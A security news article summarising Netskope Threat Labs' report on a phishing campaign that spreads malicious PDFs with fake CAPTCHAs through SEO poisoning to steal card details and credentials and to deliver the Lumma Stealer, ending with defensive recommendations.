Netskope Threat Labs recently revealed a large-scale phishing operation that has been spreading across the internet. The operation involves 260 domains hosting approximately 5,000 malicious PDF files that are disguised as legitimate resources. These files use fake CAPTCHA prompts to redirect unsuspecting victims to phishing sites that are designed to steal credit card details and personal information.
This phishing campaign has been active since the second half of 2024 and has affected over 1,150 organizations and 7,000 users globally. The attackers behind this operation have targeted technology, financial services, and manufacturing sectors in regions such as North America, Asia, and Southern Europe.
One of the main tactics used in this campaign is search engine optimization (SEO) poisoning, where attackers ensure that malicious PDFs appear prominently in search results for common queries. Additionally, the attackers embed images of fake CAPTCHAs into the PDFs, hosted on platforms like Webflow’s content delivery network (CDN), to deceive users into interacting with what seems like a legitimate verification step.
When users click on these fake CAPTCHAs, they are directed to phishing pages that impersonate trusted brands. Here, victims are prompted to enter their payment details or login credentials, falling into the traps set by the cybercriminals. Netskope’s analysis of the situation revealed that a significant percentage of the malicious PDFs target users searching for user manuals or technical guides, as well as templates for invoices, tax forms, or legal agreements. The attackers strategically embedded keywords like “free,” “downloadable,” and “printable” in these files to exploit users looking for time-sensitive resources.
Moreover, the attackers expanded their reach by uploading the malicious PDFs to well-known repositories like PDFCoffee, PDF4Pro, and the Internet Archive, taking advantage of the inherent trustworthiness of these platforms. By utilizing multiple content delivery networks, including Webflow’s CDN and domains associated with GoDaddy, Strikingly, Wix, and Fastly, the attackers have made it challenging to detect their fraudulent content among legitimate traffic.
Researchers identified three distinct phishing strategies used in this campaign, including direct financial theft, credential harvesting, and malware delivery using the Lumma Stealer. While most PDFs focused on financial scams, some served as entry points for the Lumma Stealer, an infostealer capable of extracting sensitive information like browser passwords, cryptocurrency wallets, and session cookies from the victims.
The attack chain typically begins when a victim clicks on a download button embedded in a PDF, redirecting them to a page with instructions to paste a PowerShell command into the Run dialog. This command fetches a script from a compromised WordPress site using MSHTA technology, which then downloads and executes the Lumma Stealer. To avoid detection, the attackers deliberately used PowerShell v1.0, a legacy version that is often overlooked by modern security monitoring tools.
In terms of sector-specific targeting, the technology sector bore the brunt of these attacks, followed by financial services and manufacturing. Geographically, the U.S., India, and Italy experienced the highest concentration of incidents, likely due to the dominance of these targeted industries in those regions.
Mitigating these attacks poses several challenges, especially in combating SEO-powered phishing campaigns that quickly re-emerge on different domains. Organizations are advised to deploy advanced URL filtering, restrict PowerShell execution to signed scripts, and educate employees about identifying suspicious PDF resources.
This recent phishing campaign sheds light on the increasing sophistication of cyber threats, where attackers combine social engineering tactics with infrastructure agility to deceive unsuspecting victims. As Netskope Threat Labs continues to monitor the threat landscape, the discovery emphasizes the importance of implementing layered defenses, incorporating AI-driven threat detection, strict endpoint policies, and cross-sector threat intelligence sharing.
With attackers leveraging trusted platforms to launch their attacks, proactive security measures must go beyond traditional network perimeter defenses to include user education and behavioral analytics. This highlights the need for organizations to stay vigilant and adopt robust security measures to protect themselves from evolving cyber threats.